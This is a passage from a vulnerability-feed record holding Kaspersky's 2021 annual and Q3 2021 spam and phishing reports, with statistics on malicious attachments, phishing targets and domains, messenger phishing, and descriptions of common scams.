version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[![Dynamics of phishing activity on WhatsApp in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[![Dynamics of phishing activity on Telegram in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[![Dynamics of phishing activity on Viber in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213750/securelist_spam_1-990x400.jpg)\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01-1024x711.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02-1024x452.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03-1024x490.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04-1024x429.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05-1024x613.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06-1024x351.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07-1024x661.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09-1024x455.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1-1024x672.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11-1024x278.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12-1024x618.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13-1024x534.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14-1024x746.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15-1024x427.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16-1024x352.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17-1024x587.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[![Dynamics of phishing activity on WhatsApp, Q3 2021](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[![Dynamics of phishing activity on Telegram, Q3 2021](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name 